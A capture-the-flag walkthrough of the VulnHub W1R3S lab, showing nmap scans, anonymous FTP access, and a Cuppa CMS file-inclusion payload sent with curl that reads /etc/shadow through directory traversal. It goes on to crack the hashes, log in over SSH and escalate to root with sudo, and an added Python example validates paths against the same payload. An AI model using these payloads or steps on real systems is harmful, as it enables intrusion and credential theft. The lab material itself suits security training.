vulnhub-W1R3S

Reconnaissance

nmap -p- --min-rate 1000 -sT -sV -O 192.168.206.130

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:6F:43:28 (VMware)
Aggressive OS guesses: Linux 3.10 - 4.11 (98%), Linux 5.1 - 5.15 (95%), Linux 3.2 - 4.14 (94%), Linux 3.13 - 4.4 (94%), Linux 4.10 (94%), Linux 4.4 (93%), Linux 3.10 (92%), Linux 3.16 - 4.6 (92%), OpenWrt 19.07 (Linux 4.14) (92%), Linux 2.6.32 - 3.13 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel

nmap -p- --min-rate 1000 -sU 192.168.206.130

PORT STATE SERVICE
3306/udp closed mysql

nmap -p- --min-rate 1000 --script=vuln 192.168.206.130

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_  /wordpress/wp-login.php: Wordpress login page.
3306/tcp open mysql

ftp

Anonymous login

anonymous/null


Downloaded 01.txt, 02.txt, 03.txt, worktodo.txt and employee-names.txt with mget; none of them contain sensitive information.

web

Directory scanning revealed the CMS path; exploiting the installer failed.
/administrator/installation

The CMS has a file-inclusion exploit.

searchsploit cuppa


Download the exploit

searchsploit cuppa -m 25971.txt

The exploit's default payload for this CMS

http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/shadow

The parameter has to be sent via POST with URL encoding, which gives the final payload:

curl http://192.168.206.130/administrator/alerts/alertConfigField.php --data-urlencode "urlConfig=../../../../../../../../../etc/shadow"
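The file inclusion above works because the urlConfig value reaches an include sink without a containment check. The following is an added defensive example (not Cuppa's code and not from the walkthrough) showing the validation such a sink needs; CONFIG_BASE is an assumed path.

```python
import posixpath
from urllib.parse import unquote

# Assumed location of the CMS's alert config files (hypothetical path).
CONFIG_BASE = "/var/www/html/administrator/alerts/config"

def resolve_config_path(user_value: str, base: str = CONFIG_BASE):
    """Map a user-supplied config name to a file inside `base`.

    Returns the canonical absolute path when the value is acceptable and
    None when it must be rejected (the check the urlConfig sink lacks).
    """
    if not user_value:
        return None
    # Decode once so %2e%2e%2f is judged as the "../" it will become.
    value = unquote(user_value)
    # Stream wrappers and remote URLs must never reach an include sink.
    if "://" in value or value.lower().startswith(("php:", "data:", "file:")):
        return None
    # NUL bytes historically truncated include paths; treat them as hostile.
    if "\x00" in value:
        return None
    # Only *.php config files are legitimate targets of this include.
    if not value.endswith(".php"):
        return None
    # Canonicalize first, then check containment: normpath collapses every
    # "../" so the result is the file the include would actually open.
    candidate = posixpath.normpath(posixpath.join(base, value))
    if not candidate.startswith(base.rstrip("/") + "/"):
        return None  # escaped the config directory (or was an absolute path)
    return candidate


def triage(values):
    """Classify a batch of submitted urlConfig values: path if allowed, else None."""
    return {v: resolve_config_path(v) for v in values}


if __name__ == "__main__":
    # Constructed sample inputs: the payload from the walkthrough, an
    # URL-encoded variant, an absolute path and a legitimate file name.
    samples = [
        "../../../../../../../../../etc/shadow",
        "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fshadow",
        "/etc/shadow",
        "default.php",
    ]
    for value, resolved in triage(samples).items():
        print(f"{value!r:45} -> {'REJECTED' if resolved is None else resolved}")
```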

The response contains three password hashes:

root:666vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ
data:$68JMxE7l08JMxE7l08JMxE7l0yQ16jM…ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0…Zk.TUKDoDAVRCoXiZAH.Ud
w1r3s:666xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1i

Cracking
john 1.txt recovers the w1r3s password

getshell

ssh w1r3s/computer

Privilege escalation

sudo -l shows ALL

Escalate directly

sudo /bin/bash

Author: BugAlice01